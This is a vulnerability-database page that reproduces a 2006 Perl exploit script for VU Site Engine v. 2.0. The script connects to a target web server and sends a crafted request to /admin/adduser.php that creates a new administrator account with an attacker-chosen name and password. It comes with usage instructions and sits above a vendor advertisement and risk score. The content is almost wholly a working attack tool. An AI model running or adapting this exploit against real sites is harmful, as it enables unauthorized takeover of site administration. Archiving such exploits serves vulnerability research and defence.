Lucene search
vuSQL.pl.txt
Exploit for VU Site Engine v. 2.0 to add a new admin via vulnerability in adduser.php.
Show more
`#!/usr/bin/perl
use IO::Socket;
# VU Site Engine v. 2.0 add new admin exploit
# Bug found GeW (http://www.security.nitro.ru)
# Exploit coded by Censored - SV
#--------------------------------------------
# Search Vulnerabilities // www.svt.nukleon.us
if (@ARGV < 3) { &usage; }
$host=$ARGV[0];
$new_admin = $ARGV[1];
$pass = $ARGV[2];
$host =~ s/(http:\/\/)//eg;
print "[~] Connect to $host\n";
$bug="/admin/adduser.php?logged_user=3&usern=$new_admin&pass=$pass&type=2&used=1";
$socket=IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "Can't connect to $host\n";
print "[+] Connect, one moment\n";
print $socket "POST $bug HTTP/1.1\n";
print $socket "Host: $host\n";
print $socket "Accept: */*\n";
print "[~] On $host add new admin\n";
print "[+] nick: $new_admin\n";
print "[+] pass: $pass\n";
sub usage ()
{ print q(~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
VU Site Engine v. 2.0 add new admin exploit
----------------------------------------------
E.G.
sv-VUSite.pl www.bla.com Hats hats
Usage:
perl sv-VUSite.pl [host] [admin nick] [pass]
Params:
[host] - vulnerabilities Host
[admin nick] - new admin nick
[pass] - pass for new admin
----------------------------------------------
Coded by Censored
Search vulnerabilities // www.svt.nukleon.us
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
);
exit();
}
`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo26 Feb 2006 00:00Current
7.4High risk
Vulners AI Score7.4